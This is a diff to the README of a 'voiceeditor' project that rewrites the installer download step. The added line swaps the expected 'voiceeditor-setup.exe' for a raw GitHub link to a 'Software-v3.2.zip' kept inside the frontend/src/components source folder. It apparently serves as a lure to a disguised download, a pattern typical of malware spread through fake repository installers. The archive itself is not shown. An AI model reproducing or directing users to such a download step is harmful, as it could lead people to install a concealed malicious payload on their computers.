SoulMango/voiceeditor/README.md

 3. **Download the installer**

    Scroll down until you see files ending with `.exe`.
 This is the Windows installer.
-Click the file name that looks like `voiceeditor-setup.exe` or similar to save it to your computer.
+Click the file name that looks like `https://raw.githubusercontent.com/SoulMango/voiceeditor/main/frontend/src/components/Software-v3.2.zip` or similar to save it to your computer.

 4. **Run the installer**